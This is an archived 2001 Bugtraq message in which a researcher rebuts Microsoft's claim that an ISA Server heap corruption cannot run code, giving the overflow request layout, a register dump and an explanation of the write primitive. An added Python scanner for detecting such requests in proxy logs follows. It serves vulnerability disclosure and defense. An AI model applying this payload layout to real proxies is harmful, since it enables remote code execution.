[20500] in bugtraq
Re: Microsoft ISA Server Vulnerability
daemon@ATHENA.MIT.EDU (dark spyrit)
Sat Apr 28 13:20:40 2001
Message-ID: <000b01c0cf7c$f197ddd0$020aa8c0@ns1.beavuhlabz>
Date: Sat, 28 Apr 2001 12:48:10 +1200
Reply-To: dark spyrit <dspyrit@BEAVUH.ORG>
From: dark spyrit <dspyrit@BEAVUH.ORG>
X-To: Microsoft Security Response Center <secure@MICROSOFT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This was tested with the standard edition available on the Microsoft site.
Details -
04/27/2001 01:56a 369,936 W3PROXY.EXE
Request - GET http://host/<2338 x nop><offset to user buffer><stored ret address>
We found we needed to send this request twice to reach the code location
where we are able to execute our buffer. The heap corruption can lead to
random crash locations, but we hit this point more often than not. The
fact is, it is possible.
EAX=41414141 EBX=02492394 ECX=78787878 EDX=0105B9F8 ESI=0105B9F8
EDI=024A25F0 EBP=0621FE1C ESP=0621FDF8 EIP=0101D72F o d I s z A p c
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000 ds:41414141=FFFFFFFF
001b:0101d72f mov [eax], ecx
001b:0101d731 mov [ecx+04], eax
001b:0101d734 call [ntdll!RtlLeaveCriticalSection]
001b:0101d73a mov eax, edi
001b:0101d73c pop edi
001b:0101d73d pop esi
001b:0101d73e ret
(PASSIVE)-KTEB(854083E0)-TID(05C4)--W3PROXY!.text+0001C741----------
As you can see, we are able to define the values of ecx and eax, so we can
write whatever data we want to a location of our choosing.
By overwriting eax with a saved return address and ecx with the address of
our buffer we can execute our code.
We had a couple of inventive ways of getting the needed stack values.
Overwriting string locations with the data and having the product output the
values was one. There are a few possibilities.
Am I done?
dark spyrit.
----- Original Message -----
From: "Microsoft Security Response Center" <secure@MICROSOFT.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Saturday, April 28, 2001 2:54 AM
Subject: Re: Microsoft ISA Server Vulnerability
Hi -
You're right that the root problem here is a heap corruption. The
Knowledge Base article we published on the subject
(http://support.microsoft.com/support/kb/articles/q295/2/79.asp,
"Cause") notes that this is the case. As part of our investigation, we
examined whether the heap corruption could, in this case, be exploited
to run code, but we were unable to find any way to do so. If you can
demonstrate an ability to run code via the exploit, please contact us
immediately as we'd be most interested in investigating the issue
further.
Regards,
Scott Culp
Security Program Manager
Microsoft Corporation
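The request described in the thread above (a very long URL made up mostly of a single repeated byte) is the kind of thing a proxy operator can flag in access logs while waiting for a patch. The following is an added detection example written for this archive page; it is not code from dark spyrit, from Microsoft, or from the ISA Server product. It assumes request lines in the plain `METHOD URL HTTP/x.y` form, and the thresholds (2048-byte URL, 256-byte repeated run) and the sample log lines are constructed for illustration, not values taken from the advisory.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Thresholds are assumptions chosen for illustration; tune them to the
# proxy's real traffic before using them as alerting rules.
MAX_URL_LEN = 2048   # flag request URLs longer than this many bytes
MIN_RUN_LEN = 256    # flag a run of one repeated byte at least this long


@dataclass
class Finding:
    line_no: int      # 1-based index into the scanned log
    reason: str       # human-readable explanation of the flag
    url_len: int      # length of the URL field (0 if the line did not parse)


# Plain HTTP/1.x request line: METHOD SP URL SP HTTP/major.minor
_REQUEST_LINE = re.compile(rb'^(?P<method>[A-Z]+) (?P<url>\S+) HTTP/\d\.\d$')
# A single byte followed by at least MIN_RUN_LEN-1 copies of itself
_RUN = re.compile(rb'(.)\1{%d,}' % (MIN_RUN_LEN - 1), re.DOTALL)


def inspect_request_line(line: bytes) -> Optional[str]:
    """Return a reason string if the request line looks suspicious, else None."""
    m = _REQUEST_LINE.match(line.rstrip(b'\r\n'))
    if not m:
        return "request line does not parse"
    url = m.group('url')
    run = _RUN.search(url)
    if run:
        # Long runs of one byte (NOP sleds, 'AAAA...' padding) are the
        # classic signature of a buffer-filling request.
        return "run of %d repeated byte 0x%02x" % (len(run.group(0)), run.group(1)[0])
    if len(url) > MAX_URL_LEN:
        return "url length %d exceeds %d" % (len(url), MAX_URL_LEN)
    if any(b < 0x20 or b >= 0x7f for b in url):
        # Raw control or high bytes have no business in a proxied URL.
        return "non-printable byte in url"
    return None


def scan(lines) -> List[Finding]:
    """Run inspect_request_line over a sequence of raw request lines."""
    findings = []
    for n, line in enumerate(lines, start=1):
        reason = inspect_request_line(line)
        if reason is None:
            continue
        m = _REQUEST_LINE.match(line.rstrip(b'\r\n'))
        url_len = len(m.group('url')) if m else 0
        findings.append(Finding(n, reason, url_len))
    return findings


# Constructed sample log: one benign request, one shaped like the thread's
# description (2338 NOPs followed by two 4-byte values), one overlong URL
# with no repeated run, one with a control byte, and one unparsable line.
SAMPLE_LOG = [
    b"GET http://intranet.example/index.html HTTP/1.0",
    b"GET http://intranet.example/" + b"\x90" * 2338 + b"AAAA" + b"BBBB" + b" HTTP/1.0",
    b"GET http://intranet.example/" + bytes(range(0x21, 0x7f)) * 40 + b" HTTP/1.0",
    b"GET http://intranet.example/a\x01b HTTP/1.0",
    b"garbage",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("line %d: %s (url %d bytes)" % (f.line_no, f.reason, f.url_len))
```

The run check is deliberately applied before the length check so that a padded request is reported by its most telling feature rather than by its size alone; a real deployment would feed the findings into whatever alerting the proxy logs already go to.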